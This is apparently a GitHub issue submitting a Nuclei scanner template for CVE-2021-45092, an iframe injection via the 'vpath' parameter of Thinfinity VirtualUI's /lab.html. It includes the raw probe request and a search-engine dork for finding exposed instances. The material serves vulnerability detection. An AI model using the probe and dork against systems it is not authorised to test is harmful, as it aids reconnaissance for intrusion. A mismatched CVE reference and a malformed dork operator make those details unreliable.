You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
CVE-2021-45092: Thinfinity VirtualUI is a web remote desktop system, a vulnerability exist in a function located in /lab.html reachable by default that could allow IFRAME injection via the "vpath" parameter.
id: CVE-2021-45092
info:
name: Iframe functionallity
author: danielmofer
severity: medium
description: Thinfinity VirtualUI is a web remote desktop system, a vulnerability exist in a function located in /lab.html reachable by default that could allow IFRAME injection via the "vpath" parameter.
reference:
- https://github.com/cybelesoft/virtualui/issues/2
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44848
- https://www.tenable.com/cve/CVE-2021-45092
tags: cve,cve2021,misconfiguration
requests:
- raw:
- |
GET /lab.html?vpath=//wikipedia.com HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
matchers:
- type: regex
regex:
- ".*vpath.*"
part: body
Template Information:
CVE-2021-45092: Thinfinity VirtualUI is a web remote desktop system, a vulnerability exist in a function located in /lab.html reachable by default that could allow IFRAME injection via the "vpath" parameter.
Reference
Nuclei Template:
Example of the response:
To test it you can use the Google Dork: insite:"Thinfinity VirtualUI"
The text was updated successfully, but these errors were encountered: